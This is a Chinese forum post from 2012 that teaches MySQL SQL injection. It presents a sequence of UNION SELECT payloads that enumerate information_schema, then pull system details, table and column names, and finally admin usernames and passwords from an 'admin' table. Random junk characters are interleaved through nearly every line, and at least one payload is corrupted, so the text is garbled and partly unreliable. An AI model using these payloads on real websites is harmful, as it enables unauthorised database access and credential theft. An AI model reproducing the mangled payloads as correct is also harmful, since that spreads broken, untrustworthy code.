本文介绍MYSQL盲注的一些语句和方法3 K0 D$ j* Y' ~4 R: B$ s R
5 F9 R6 R% P$ ^5 B3 N7 x
学习盲注前先了解下 IFORMATION_SCHEMA 库
j4 W5 C3 @0 z8 W: ^9 p/ h% W/ k1 D* S2 O' }8 `+ g( X
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
% ^" T0 p( ^; \ T# h) j存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
3 M; A8 R- A5 E7 i; P! P9 T1.得到所有数据库名:/ }+ I9 G& b# v! `" s! y
|SCHEMATA ->存储数据库名的表 ?$ E" N5 N8 D" g5 w% I, S
|---字段:SCHEMA_NAME ->数据库名称
9 N f8 B+ A% L6 N8 O+ C/ `: ^6 q/ @& G- I9 e
|TABLES ->存储表名! U- K% t' m: N9 {- c- M; U
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
$ f* G( O: k8 i! W/ p9 t|---字段:TABLE_NAME ->存储表的表名
9 v% [9 c' r- {6 [5 }' P' ~2 Q8 P. t; h+ r1 ^
|COLUMNS ->存储的字段名表
- V6 c, ~' H. c2 E2 |) U|---字段:TABLE_SCHEMA ->该字段所属数据库名6 q+ ~5 w6 _1 s
|---字段:TABLE_NAME ->存储所属表的名称. j8 t+ L& {. V7 j" k5 f
G) I8 t% c/ W" D+ c+ x3 _6 f
|---字段:COLUMN_NAME ->该字段的名称
- S' _0 g0 \& O @
8 v' h: C" a3 p3 `; O
+ M. V7 M3 \" \6 x; `5 C* t# u( F1 J9 g: u+ d
###########################################################################
8 a9 u' U9 U' w) t' P7 q) G
% u. I4 A- \6 i: |8 i# \0x001 获取系统信息:
- J! ]* S! f! \2 R& n/ k" ]* j/ W6 G# I7 a% M; ]( \) G7 ]0 d9 L
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
& b+ u3 f' F+ I0 E0 O/ N' `6 Z4 H. D( T Q) ?
/*5 _* C( g" @( D* `+ j. [
, [! p5 C. g+ y6 H6 m# h- K+ r@@global.version_compile_os 获取系统版本
) y$ I; P ?- @& |+ y5 X, A$ Q6 \3 _! o5 F% O4 i. k; h
@@datadir 数据库路径
& \* X r2 v _9 e' c; Pdatabase() 当前数据库名称
: @8 S, {. L; q* N0x3c62723e 换行HEX值
4 f0 E; M& H% G" s/ ?0 K! S, ?% g; U) f
*/
- l; I8 ~' e2 V, T' k2 E0 m- N; i2 v: s- t; h6 l
4 W$ ?' k9 e1 y+ J
# d7 r" S+ t" i8 e7 u: {0 w+ d4 N
######################################################################( D I! Y' k' R3 O5 p0 b
( {/ U! I5 D3 O) Q3 y1 r4 R S" c0x002 获取表名9 N: x; X1 W) y
% B$ K0 m. i3 y
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
2 G7 ~% F1 H! _4 ]8 {
[) g! }' a: c$ s
- X5 W# k7 d1 |. O3 v" Z4 ]$ K
' x8 k# K5 o6 X5 a8 E/*7 V: _* k6 m1 z( }" h7 m
T% n) C9 d( a# L7 z0x67617264656e 为当前数据库名* ~! v# L2 X: k. H0 y) I7 L
9 P: e1 [ \+ |6 L6 Z
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名; h$ ~/ L0 P' \
7 u3 c- }5 [; T8 E% D9 x! Z*/
% S" E! H% R D9 U6 f( U- k4 q7 d, `
######################################################################5 o5 ~; H' J8 s6 g: Q" j
. ^+ g" H1 p0 W/ N/ t
2 L7 {% I% i2 S0 a
' p& m8 \& Z6 G# H5 N& ]0x003 获取字段
+ W# n- u" z" u) n& q1 K# h6 H
( r, L6 }. |; i4 @% H* xunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
/ `9 S G% X% ~- ~8 Q7 y7 h# J! w
/*
" ~! m% h4 Z0 ~) B0 `: N" E& r9 Y5 `5 m' C. e3 ^0 ^1 i4 p
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
$ u! S$ |% }( W2 t: W
3 Y2 u+ O& u# M: f# v* b. m. n0x61646d696e ->选择一个表) M$ c+ j# r, l; G, l: s) H
: k2 [% u+ f, p0x67617264656e ->数据库名7 `; o% Y# {0 Y" Z8 c' I
" m9 _7 K) ]/ r$ t6 F# p
*/
/ s0 D# D t/ |! |3 N
: g; |% `& e* T6 ^#####################################################################9 a8 S; d' o1 B
$ ]* e6 J5 B/ |+ c( q2 q- c: U
) S% s- Y! P3 z% a* w1 N# u: U2 }$ c
$ r( e9 F8 B" D6 e7 Y( b8 L( g0x004 获取数据. J5 H# b# |' ^% | i; s' n8 h! l
" w; }/ i8 f: q! m- p7 V1 {! O
union select 1,2,3
0 L: |6 I, p+ n,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin3 g {4 n" {+ T! H7 U) N
( `5 c9 u2 t. l, D; Gunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
/ [" V9 \" _, N* o# ^% i9 n! n9 K7 \+ O) A# V
( J2 @7 w3 t* h7 f. g
5 O9 j0 x! T7 k' j$ ~/*
9 s; Y9 P( g: ^" I4 w. e! R% F6 G3 I
F8 W- ~( m4 u- ^( S4 \0x3c62723e 换行符号HEX编码
5 _, |% @, p( L. D% P+ P% I0 Y; j- v0 R' c9 t: m: H
group_concat 同时获得该字段所有数据
9 {# x$ C; r9 h) |+ I! e. l1 J" \; n' \ ^
*/
$ E9 T1 L9 y; c( d) _9 f
/ E* T: l; I" t. } |
发表于 2012-9-13 17:48:44
收藏
支持
反对